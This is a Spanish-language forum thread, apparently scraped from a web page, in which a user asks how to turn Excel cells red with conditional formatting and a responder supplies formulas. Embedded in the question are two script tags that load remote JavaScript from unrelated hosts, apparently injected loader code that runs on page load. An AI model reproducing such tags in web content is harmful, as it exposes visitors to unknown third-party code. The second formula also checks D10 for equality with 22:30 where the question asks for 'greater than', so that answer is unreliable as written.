Como cambiar las propiedades de una celda al introducir datos en otra celda

Hola; Desearía saber como puedo hacer que el texto cambie de color al modificar una celda:

Ejemplo:

Al introducir datos en la columna B los datos de la columna C se pongan en rojo.

y si es posible que cuando la columna D y la columna E cumplan una condición el texto de toda la fila se ponga en rojo.

Ejemplo:

Cuando D10 es > 22:30 y E10 es 320 toda el texto de la fila 10 se ponga en rojo.

Muchísimas gracias

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Respuesta

Xangel te mando mis propuestas:

1 pregunta:

Al introducir datos en la columna B los datos de la columna C se pongan en rojo.

Esto se puede hacer perfectamente con formato condicional para ello (puesto que no me lo has dicho), me imagino que mi rango es B1:C50:

Marcamos con el ratón el rango C1:C50 y vas al menu de formato condicional, que está en la cinta inicio, y dentro eliges la opción de fórmula que es la última. En el recuadra que aparece tienes que insertar esta fórmula:

=$B1<>""

Después solo tienes que elegir el color de fondo rojo y pulsar en aceptar. Ya está preparada para que cuando introduzcas cualquier cosa en las celdas de la columna B la C se pondrá en rojo.

2 pregunta:

"Cuando D10 es > 22:30 y E10 es 320 toda el texto de la fila 10 se ponga en rojo."

Marcamos con el ratón todas las celdas con datos de la fila 10, por ejemplo B10:H10.

Ahora entras en formato condicional y en su opción de fórmula escribes esto:

=Y($D$10*24=22,5;$E$10=320)

Después elige un color de fondo y pulsas aceptar. En este instante cuando en la celda D10 pongas 22:30 y en la celda E10 pongas 320 se pintará toda la fila del mismo color, en mi caso era desde B10 hasta H10

Recuerda finalizar la consulta

Los rangos eran de ejemplo ahora ajustare tus respuestas a mis necesidades.

Como siempre muchísimas gracias por tu ayuda.

Slds